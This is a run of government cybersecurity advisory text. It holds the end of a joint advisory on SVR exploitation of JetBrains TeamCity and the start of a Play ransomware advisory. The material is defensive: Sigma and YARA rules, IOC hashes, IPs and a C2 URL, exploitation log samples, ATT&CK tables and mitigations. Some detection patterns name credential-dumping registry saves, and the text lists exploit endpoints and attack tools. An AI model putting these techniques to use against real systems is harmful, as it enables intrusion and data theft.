SVR cyber actors use OneDrive and Dropbox to exfiltrate data to their C2 station.
INDICATORS OF COMPROMISE
Note: Please refer to Appendix B for a list of IOCs.
VICTIM TYPES
As a result of this latest SVR cyber activity, the FBI, CISA, NSA, SKW, CERT Polska, and NCSC have identified a few dozen compromised companies in the United States, Europe, Asia, and Australia, and are aware of over a hundred compromised devices though we assess this list does not represent the full set of compromised organizations. Generally, the victim types do not fit into any sort of pattern or trend, aside from having an unpatched, Internet-reachable JetBrains TeamCity server, leading to the assessment that SVR’s exploitation of these victims’ networks was opportunistic in nature and not necessarily a targeted attack. Identified victims included: an energy trade association; companies that provide software for billing, medical devices, customer care, employee monitoring, financial management, marketing, sales, and video games; as well as hosting companies, tools manufacturers, and small and large IT companies.
DETECTION METHODS
The following rules can be used to detect activity linked to adversary activity. These rules should serve as examples and adapt to each organization’s environment and telemetry.
SIGMA Rules
title: Privilege information listing via whoami
description: Detects whoami.exe execution and listing of privileges
author:
references: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'whoami.exe'
CommandLine|contains:
- 'priv'
- 'PRIV'
condition: selection
falsepositives: legitimate use by system administrator
title: DC listing via nltest
description: Detects nltest.exe execution and DC listing
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'nltest.exe'
CommandLine|re: '.*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*'
condition: selection
falsepositives: legitimate use by system administrator
title: DLL execution via WMI
description: Detects DLL execution via WMI
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'WMIC.exe'
CommandLine|contains|all:
- 'call'
- 'rundll32'
condition: selection
falsepositives: legitimate use by software or system administrator
title: Process with connect and pass as args
description: Process with connect and pass as args
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'pass'
- 'connect'
condition: selection
falsepositives: legitimate use of rsockstun or software with exact same arguments
title: Service or Drive enumeration via powershell
description: Service or Drive enumeration via powershell
author:
references:
date: 2023/11/15
logsource:
category: ps_script
product: windows
detection:
selection_1:
ScriptBlockText|contains|all:
- 'Get-WmiObject'
- '-Class'
- 'Win32_Service'
selection_2:
ScriptBlockText|contains|all:
- 'Get-WindowsDriver'
- '-Online'
- '-All'
condition: selection_1 or selection_2
falsepositives: legitimate use by system administrator
title: Compressing files from temp to temp
description: Compressing files from temp\ to temp used by SVR to prepare data to be exfiltrated
references:
author:
date: 2023/11/15
logsource:
category: ps_script
product: windows
detection:
selection:
ScriptBlockText|re: '.*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1-9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*'
condition: selection
title: DLL names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific DLL names.
references:
author:
date: 2023/11/15
logsource:
category: image_load
product: windows
detection:
selection:
ImageLoaded|endswith:
- 'AclNumsInvertHost.dll'
- 'ModeBitmapNumericAnimate.dll'
- 'UnregisterAncestorAppendAuto.dll'
- 'DeregisterSeekUsers.dll'
- 'ScrollbarHandleGet.dll'
- 'PerformanceCaptionApi.dll'
- 'WowIcmpRemoveReg.dll'
- 'BlendMonitorStringBuild.dll'
- 'HandleFrequencyAll.dll'
- 'HardSwapColor.dll'
- 'LengthInMemoryActivate.dll'
- 'ParametersNamesPopup.dll'
- 'ModeFolderSignMove.dll'
- 'ChildPaletteConnected.dll'
- 'AddressResourcesSpec.dll'
condition: selection
title: Sensitive registry entries saved to file
description: Sensitive registry entries saved to file
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection_base:
Image|endswith:
- 'reg.exe'
CommandLine|contains: 'save'
CommandLine|re: '.*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*'
selection_file:
CommandLine|re: '.*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*'
condition: selection_base and selection_file
title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
category: taskscheduler
product: windows
detection:
selection:
EventID:
- 4698
- 4699
- 4702
TaskName:
- '\Microsoft\Windows\IISUpdateService'
- '\Microsoft\Windows\WindowsDefenderService'
- '\Microsoft\Windows\WindowsDefenderService2'
- '\Microsoft\DefenderService'
- '\Microsoft\Windows\DefenderUPDService'
- '\Microsoft\Windows\WiMSDFS'
- '\Microsoft\Windows\Application Experience\StartupAppTaskCkeck'
- '\Microsoft\Windows\Windows Error Reporting\SubmitReporting'
- '\Microsoft\Windows\Windows Defender\Defender Update Service'
- '\WindowUpdate'
- '\Microsoft\Windows\Windows Error Reporting\CheckReporting'
- '\Microsoft\Windows\Application Experience\StartupAppTaskCheck'
- '\Microsoft\Windows\Speech\SpeechModelInstallTask'
- '\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStart'
- '\Microsoft\Windows\Data Integrity Scan\Data Integrity Update'
- '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
- '\Microsoft\Windows\ATPUpd'
- '\Microsoft\Windows\Windows Defender\Service Update'
- '\Microsoft\Windows\WindowsUpdate\Scheduled Check'
- '\Microsoft\Windows\WindowsUpdate\Scheduled AutoCheck'
- '\Defender'
- '\defender'
- '\\Microsoft\\Windows\\IISUpdateService'
- '\\Microsoft\\Windows\\WindowsDefenderService'
- '\\Microsoft\\Windows\\WindowsDefenderService2'
- '\\Microsoft\\DefenderService'
- '\\Microsoft\\Windows\\DefenderUPDService'
- '\\Microsoft\\Windows\\WiMSDFS'
- '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'
- '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'
- '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'
- '\\WindowUpdate'
- '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'
- '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'
- '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'
- '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'
- '\\Microsoft\\Windows\\Data Integrity Scan\Data Integrity Update'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
- '\\Microsoft\\Windows\\ATPUpd'
- '\\Microsoft\\Windows\\Windows Defender\\Service Update'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'
- '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'
- '\\Defender'
- '\\defender'
condition: selection
title: Scheduled tasks names used by SVR for GraphicalProton backdoor
description: Hunts for known SVR-specific scheduled task names
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'schtasks.exe'
CommandLine|contains:
- 'IISUpdateService'
- 'WindowsDefenderService'
- 'WindowsDefenderService2'
- 'DefenderService'
- 'DefenderUPDService'
- 'WiMSDFS'
- 'StartupAppTaskCkeck'
- 'SubmitReporting'
- 'Defender Update Service'
- 'WindowUpdate'
- 'CheckReporting'
- 'StartupAppTaskCheck'
- 'SpeechModelInstallTask'
- 'BfeOnServiceStart'
- 'Data Integrity Update'
- 'Scheduled AutoCheck'
- 'ATPUpd'
- 'Service Update'
- 'Scheduled Check'
- 'Scheduled AutoCheck'
- 'Defender'
- 'defender'
selection_re:
Image|endswith:
- 'schtasks.exe'
CommandLine|re:
- '.*Defender\sUpdate\sService.*'
- '.*Data\sIntegrity\sUpdate.*'
- '.*Scheduled\sAutoCheck.*'
- '.*Service\sUpdate.*'
- '.*Scheduled\sCheck.*'
- '.*Scheduled\sAutoCheck.*'
condition: selection or selection_re
title: Suspicious registry modifications
description: Suspicious registry modifications
author:
references:
date: 2023/11/15
logsource:
category: registry_set
product: windows
detection:
selection:
EventID: 4657
TargetObject|contains:
- 'CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'
- 'CurrentControlSet\\Control\\Lsa\\NoLMHash'
condition: selection
title: Registry modification from cmd
description: Registry modification from cmd
author:
references:
date: 2023/11/15
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- 'reg.exe'
CommandLine|contains|all:
- 'CurrentControlSet'
- 'Lsa'
CommandLine|contains:
- 'DisableRestrictedAdmin'
- 'NoLMHash'
condition: selection
title: Malicious Driver Load
description: Detects the load of known malicious drivers via their names or hash.
references:
- https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection
author:
date: 2023/11/15
logsource:
category: driver_load
product: windows
detection:
selection_name:
ImageLoaded|endswith:
- 'RTCore64.sys'
- 'DBUtils_2_3.sys'
selection_hash:
Hashes|contains:
- '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'
- '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'
condition: selection_name or selection_hash
YARA rules
The following rule detects most known GraphicalProton variants.
rule APT29_GraphicalProton {
strings:
// C1 E9 1B shr ecx, 1Bh
// 48 8B 44 24 08 mov rax, [rsp+30h+var_28]
// 8B 50 04 mov edx, [rax+4]
// C1 E2 05 shl edx, 5
// 09 D1 or ecx, edx
// 48 8B 44 24 08 mov rax, [rsp+30h+var_28]
$op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 | 0d | 07) 09 ?? 48 }
// 48 05 20 00 00 00 add rax, 20h ; ' '
// 48 89 C1 mov rcx, rax
// 48 8D 15 0A A6 0D 00 lea rdx, unk_14011E546
// 41 B8 30 00 00 00 mov r8d, 30h ; '0'
// E8 69 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 40 00 00 00 add rax, 40h ; '@'
// 48 89 C1 mov rcx, rax
// 48 8D 15 1B A6 0D 00 lea rdx, unk_14011E577
// 41 B8 70 01 00 00 mov r8d, 170h
// E8 49 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 60 00 00 00 add rax, 60h ; '`'
// 48 89 C1 mov rcx, rax
// 48 8D 15 6C A7 0D 00 lea rdx, unk_14011E6E8
// 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'
// E8 29 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 80 00 00 00 add rax, 80h
// 48 89 C1 mov rcx, rax
// 48 8D 15 7C A7 0D 00 lea rdx, unk_14011E718
// 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'
// E8 09 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 A0 00 00 00 add rax, 0A0h
$op_decrypt_config = {
48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 A0 00 00 00
}
condition:
all of them
}
Note: These rules are meant for threat hunting and have not been tested on a larger dataset.
MITIGATIONS
The FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess the scope and indiscriminate targeting of this campaign poses a threat to public safety and recommend organizations implement the mitigations below to improve organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Apply available patches for CVE-2023-42793 issued by JetBrains TeamCity in mid-September 2023, if not already completed.
Monitor the network for evidence of encoded commands and execution of network scanning tools.
Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
Require use of multi-factor authentication [CPG 1.3] for all services to the extent possible, particularly for email, virtual private networks, and accounts that access critical systems.
Organizations should adopt multi-factor authentication (MFA) as an additional layer of security for all users with access to sensitive data. Enabling MFA significantly reduces the risk of unauthorized access, even if passwords are compromised.
Keep all operating systems, software, and firmware up to date. Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.
Audit log files to identify attempts to access privileged certificates and creation of fake identity providers.
Deploy software to identify suspicious behavior on systems.
Deploy endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
Use available public resources to identify credential abuse with cloud environments.
Configure authentication mechanisms to confirm certain user activities on systems, including registering new devices.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see previous tables).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
FBI, DHS, CISA, Joint Cyber Security Advisory, Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders
NSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks
CISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise
CISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
CISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
CISA, CISA Insights, What Every Leader Needs to Know About the Ongoing APT Cyber Activity
FBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors Targeting U.S. Think Tanks
CISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development
NCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW, CERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.
VERSION HISTORY
December 12, 2023: Initial version.
APPENDIX A – INDICATORS OF COMPROMISE CVE-2023-42793
On a Windows system, the log file C:\TeamCity\logs\teamcity-server.log will contain a log message when an attacker modified the internal.properties file. There will also be a log message for every process created via the /app/rest/debug/processes endpoint. In addition to showing the command line used, the user ID of the user account whose authentication token was used during the attack is also shown. For example:
[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
An attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs individual HTTP requests, but if TeamCity is configured to sit behind a HTTP proxy, the HTTP proxy may have suitable logs showing the following target endpoints being accessed:
/app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.
/app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.
/app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary process.
Note: The user ID value may be higher than 1.
APPENDIX B – IOCS
File IoCs
GraphicalProton backdoor:
01B5F7094DE0B2C6F8E28AA9A2DED678C166D615530E595621E692A9C0240732
34C8F155601A3948DDB0D60B582CFE87DE970D443CC0E05DF48B1A1AD2E42B5E
620D2BF14FE345EEF618FDD1DAC242B3A0BB65CCB75699FE00F7C671F2C1D869
773F0102720AF2957859D6930CD09693824D87DB705B3303CEF9EE794375CE13
7B666B978DBBE7C032CEF19A90993E8E4922B743EE839632BFA6D99314EA6C53
8AFB71B7CE511B0BCE642F46D6FC5DD79FAD86A58223061B684313966EFEF9C7
971F0CED6C42DD2B6E3EA3E6C54D0081CF9B06E79A38C2EDE3A2C5228C27A6DC
CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
CD3584D61C2724F927553770924149BB51811742A461146B15B34A26C92CAD43
EBE231C90FAD02590FC56D5840ACC63B90312B0E2FEE7DA3C7606027ED92600E
F1B40E6E5A7CBC22F7A0BD34607B13E7E3493B8AAD7431C47F1366F0256E23EB
C7B01242D2E15C3DA0F45B8ADEC4E6913E534849CDE16A2A6C480045E03FBEE4
4BF1915785D7C6E0987EB9C15857F7AC67DC365177A1707B14822131D43A6166
GraphicalProton HTTPS backdoor:
18101518EAE3EEC6EBE453DE4C4C380160774D7C3ED5C79E1813013AC1BB0B93
19F1EF66E449CF2A2B0283DBB756850CCA396114286E1485E35E6C672C9C3641
1E74CF0223D57FD846E171F4A58790280D4593DF1F23132044076560A5455FF8
219FB90D2E88A2197A9E08B0E7811E2E0BD23D59233287587CCC4642C2CF3D67
92C7693E82A90D08249EDEAFBCA6533FED81B62E9E056DEC34C24756E0A130A6
B53E27C79EED8531B1E05827ACE2362603FB9F77F53CEE2E34940D570217CBF7
C37C109171F32456BBE57B8676CC533091E387E6BA733FBAA01175C43CFB6EBD
C40A8006A7B1F10B1B42FDD8D6D0F434BE503FB3400FB948AC9AB8DDFA5B78A0
C832462C15C8041191F190F7A88D25089D57F78E97161C3003D68D0CC2C4BAA3
F6194121E1540C3553273709127DFA1DAAB96B0ACFAB6E92548BFB4059913C69
Backdoored vcperf:
D724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443
Backdoored Zabbix installation archive:
4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F
Backdoored Webroot AV installation archive:
950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4
Modified rsockstun
CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
Network IoCs
Tunnel Endpoints
65.20.97[.]203
65.21.51[.]58
Exploitation Server
103.76.128[.]34
GraphicalProton HTTPS C2 URL:
hxxps://matclick[.]com/wp-query[.]php
December 12, 2023
A vulnerability has been identified in various devices running different operating systems, including Android, Linux, iOS and macOS, while the Bluetooth functionality is enabled.
December 12, 2023
Apple has released iOS 16.7.3, iOS 17.2, iPadOS 16.7.3 and iPadOS 17.2 to fix the vulnerabilities in various Apple devices.
December 12, 2023
SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.
Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.
In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.
The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.
The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date.
Download a PDF version of this report:
AA23-352A #StopRansomware: Play Ransomware
(PDF, 536.19 KB
)
For a downloadable copy of IOCs, see:
AA23-352A STIX XML
(XML, 34.87 KB
)
AA23-352A STIX JSON
(JSON, 30.22 KB
)
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK for Enterprise section for all referenced tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Initial Access
The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [T1078] and exploitation of public-facing applications [T1190], specifically through known FortiOS (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell [CVE-2022-41040 and CVE-2022-41082]) vulnerabilities. Play ransomware actors have been observed to use external-facing services [T1133] such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.
Discovery and Defense Evasion
Play ransomware actors use tools like AdFind to run Active Directory queries [TA0007] and Grixba [1], an information-stealer, to enumerate network information [T1016] and scan for anti-virus software [T1518.001]. Actors also use tools like GMER, IOBit, and PowerTool to disable anti-virus software [T1562.001] and remove log files [T1070.001]. In some instances, cybersecurity researchers have observed Play ransomware actors using PowerShell scripts to target Microsoft Defender.[2]
Lateral Movement and Execution
Play ransomware actors use command and control (C2) applications, including Cobalt Strike and SystemBC, and tools like PsExec, to assist with lateral movement and file execution. Once established on a network, the ransomware actors search for unsecured credentials [T1552] and use the Mimikatz credential dumper to gain domain administrator access [T1003]. According to open source reporting [2], to further enumerate vulnerabilities, Play ransomware actors use Windows Privilege Escalation Awesome Scripts (WinPEAS) [T1059] to search for additional privilege escalation paths. Actors then distribute executables [T1570] via Group Policy Objects [T1484.001].
Exfiltration and Encryption
Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files [T1560.001] into .RAR format for exfiltration. The actors then use WinSCP to transfer data [T1048] from a compromised network to actor-controlled accounts. Following exfiltration, files are encrypted [T1486] with AES-RSA hybrid encryption using intermittent encryption, encrypting every other file portion of 0x100000 bytes. [3] (Note: System files are skipped during the encryption process.) A .play extension is added to file names and a ransom note titled ReadMe[.]txt is placed in file directory C:.
Impact
The Play ransomware group uses a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note directs victims to contact the Play ransomware group at an email address ending in @gmx[.]de. Ransom payments are paid in cryptocurrency to wallet addresses provided by Play actors. If a victim refuses to pay the ransom demand, the ransomware actors threaten to publish exfiltrated data to their leak site on the Tor network ([.]onion URL).
Leveraged Tools
Table 1 lists legitimate tools Play ransomware actors have repurposed for their operations. The legitimate tools listed in this product are all publicly available. Use of these tools and applications should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
Table 1: Tools Leveraged by Play Ransomware Actors
Name
Description
AdFind
Used to query and retrieve information from Active Directory.
Bloodhound
Used to query and retrieve information from Active Directory.
GMER
A software tool intended to be used for detecting and removing rootkits.
IOBit
An anti-malware and anti-virus program for the Microsoft Windows operating system. Play actors have accessed IOBit to disable anti-virus software.
PsExec
A tool designed to run programs and execute commands on remote systems.
PowerTool
A Windows utility designed to improve speed, remove bloatware, protect privacy, and eliminate data collection, among other things.
PowerShell
A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
Cobalt Strike
A penetration testing tool used by security professionals to test the security of networks and systems. Play ransomware actors have used it to assist with lateral movement and file execution.
Mimikatz
Allows users to view and save authentication credentials such as Kerberos tickets. Play ransomware actors have used it to add accounts to domain controllers.
WinPEAS
Used to search for additional privilege escalation paths.
WinRAR
Used to split compromised data into segments and to compress files into .RAR format for exfiltration.
WinSCP
Windows Secure Copy is a free and open-source Secure Shell (SSH) File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Play ransomware actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts.
Microsoft Nltest
Used by Play ransomware actors for network discovery.
Nekto / PriviCMD
Used by Play ransomware actors for privilege escalation.
Process Hacker
Used to enumerate running processes on a system.
Plink
Used to establish persistent SSH tunnels.
Indicators of Compromise
See Table 2 for Play ransomware IOCs obtained from FBI investigations as of October 2023.
Table 2: Hashes Associated with Play Ransomware Actors
Hashes (SHA256)
Description
453257c3494addafb39cb6815862403e827947a1e7737eb8168cd10522465deb
Play ransomware custom data gathering tool
47c7cee3d76106279c4c28ad1de3c833c1ba0a2ec56b0150586c7e8480ccae57
Play ransomware encryptor
75404543de25513b376f097ceb383e8efb9c9b95da8945fd4aa37c7b2f226212
SystemBC malware EXE
7a42f96599df8090cf89d6e3ce4316d24c6c00e499c8557a2e09d61c00c11986
SystemBC malware DLL
7a6df63d883bbccb315986c2cfb76570335abf84fafbefce047d126b32234af8
Play ransomware binary
7dea671be77a2ca5772b86cf8831b02bff0567bce6a3ae023825aa40354f8aca
SystemBC malware DLL
c59f3c8d61d940b56436c14bc148c1fe98862921b8f7bad97fbc96b31d71193c
Play network scanner
e652051fe47d784f6f85dc00adca1c15a8c7a40f1e5772e6a95281d8bf3d5c74
Play ransomware binary
e8d5ad0bf292c42a9185bb1251c7e763d16614c180071b01da742972999b95da
Play ransomware binary
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 3–Table 11 for all referenced threat actor tactics and techniques in this advisory.
Table 3: Play ATT&CK Techniques for Enterprise for Initial Access
Technique Title
ID
Use
Valid Accounts
T1078
Play ransomware actors obtain and abuse existing account credentials to gain initial access.
Exploit Public Facing Application
T1190
Play ransomware actors exploit vulnerabilities in internet-facing systems to gain access to networks.
External Remote Services
T1133
Play ransomware actors have used remote access services, such as RDP/VPN connection to gain initial access.
Table 4: Play ATT&CK Techniques for Enterprise for Discovery
Technique Title
ID
Use
System Network Configuration Discovery
T1016
Play ransomware actors use tools like Grixba to identify network configurations and settings.
Software Discovery: Security Software Discovery
T1518.001
Play ransomware actors scan for anti-virus software.
Table 5: Play ATT&CK Techniques for Enterprise for Defense Evasion
Technique Title
ID
Use
Impair Defenses: Disable or Modify Tools
T1562.001
Play ransomware actors use tools like GMER, IOBit, and PowerTool to disable anti-virus software.
Indicator Removal: Clear Windows Event Logs
T1070.001
Play ransomware actors delete logs or other indicators of compromise to hide intrusion activity.
Table 6: Play ATT&CK Techniques for Enterprise for Credential Access
Technique Title
ID
Use
Unsecured Credentials
T1552
Play ransomware actors attempt to identify and exploit credentials stored unsecurely on a compromised network.
OS Credential Dumping
T1003
Play ransomware actors use tools like Mimikatz to dump credentials.
Table 7: Play ATT&CK Techniques for Enterprise for Lateral Movement
Technique Title
ID
Use
Lateral Tool Transfer
T1570
Play ransomware actors distribute executables within the compromised environment.
Table 8: Play ATT&CK Techniques for Enterprise for Command and Control
Technique Title
ID
Use
Domain Policy Modification: Group Policy Modification
T1484.001
Play ransomware actors distribute executables via Group Policy Objects.
Table 9: Play ATT&CK Techniques for Enterprise for Collection
Technique Title
ID
Use
Archive Collected Data: Archive via Utility
T1560.001
Play ransomware actors use tools like WinRAR to compress files.
Table 10: Play ATT&CK Techniques for Enterprise for Exfiltration
Technique Title
ID
Use
Exfiltration Over Alternative Protocol
T1048
Play ransomware actors use file transfer tools like WinSCP to transfer data.
Table 11: Play ATT&CK Techniques for Enterprise for Impact
Technique Title
ID
Use
Data Encrypted for Impact
T1486
Play ransomware actors encrypt data on target systems to interrupt availability to system and network resources.
Financial Theft
T1657
Play ransomware actors use a double-extortion model for financial gain.
MITIGATIONS
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the security posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI, CISA, and ASD’s ACSC recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Play ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 2.F, 2.R, 2.S] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies [CPG 2.C].
Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 2.B];
Store passwords in hashed format using industry-recognized password managers;
Add password user “salts” to shared login credentials;
Avoid reusing passwords;
Implement multiple failed login attempt account lockouts [CPG 2.G];
Disable password “hints”;
